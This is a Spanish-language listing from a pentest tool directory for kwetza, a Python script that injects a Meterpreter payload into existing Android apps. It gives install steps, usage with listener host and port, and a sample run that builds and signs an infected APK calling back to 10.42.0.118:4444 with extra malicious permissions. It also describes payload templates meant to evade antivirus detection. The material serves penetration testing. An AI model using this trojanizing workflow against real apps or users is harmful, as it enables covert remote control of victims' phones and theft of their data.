Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
kwetza — Script de Python para inyectar una carga útil de Meterpreter en aplicaciones Android existentes. | Kitploit
Herramientas/GitHubGitHub/sensepost/kwetza
Seguridad AndroidGeneración de PayloadsExplotaciónPentesting de Apps MóvilesPruebas de PenetraciónDesarrollo de Payloads
GitHubsensepost/kwetza

kwetza

Script de Python para inyectar una carga útil de Meterpreter en aplicaciones Android existentes.

Ver Repositorio
64423923hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Introducción

Arsenal

Por Chris Le Roy (@brompwnie) [email protected]

Kwetza es una herramienta que permite infectar una aplicación Android existente con un payload de Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payload personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza permite infectar aplicaciones Android utilizando los permisos predeterminados de la aplicación objetivo o inyectar permisos adicionales para obtener funcionalidades adicionales.

¿Dónde puedo obtener el blogpost?

Los pasos manuales automatizados por Kwetza se pueden encontrar aquí: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

Obteniendo el código

Primero obtén el código:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

root@kitploit:~
pip install beautifulsoup4

Kwetza requiere que Apktool esté instalado y accesible a través de tu PATH. Esto se puede configurar usando las instrucciones de instalación ubicadas aquí: https://ibotpeaches.github.io/Apktool/install

Uso

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = nombre del APK que deseas infectar.
  • https/tcp = selecciona una conexión HTTPS o TCP
  • LHOST = IP de tu listener.
  • LPORT = Puerto de tu listener.
  • yes = incluye "yes" para inyectar permisos maliciosos adicionales en la app, "no" para utilizar los permisos predeterminados de la app.
  • customClass = Especifica una actividad personalizada aquí si quieres que Kwetza inyecte en esta actividad.
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Información

Kwetza ha sido desarrollado para funcionar con Python 2.

Kwetza por defecto usará la plantilla y el almacén de claves ubicados en la carpeta "payload" para inyectar y firmar el apk infectado.

Si deseas firmar la aplicación infectada con tu propio certificado, genera un nuevo almacén de claves y colócalo en la carpeta "payload" y renómbralo con el nombre del almacén existente o cambia la referencia en kwetza.py.

Lo mismo se puede hacer para las plantillas de payload.

La contraseña para el almacén de claves predeterminado es, bueno, "password".

Licencia

Kwetza está licenciado bajo una Licencia Creative Commons Atribución-NoComercial-CompartirIgual 4.0 Internacional (http://creativecommons.org/licenses/by-nc-sa/4.0).

Los permisos más allá del alcance de esta licencia pueden estar disponibles en http://sensepost.com/contact

Descargar herramienta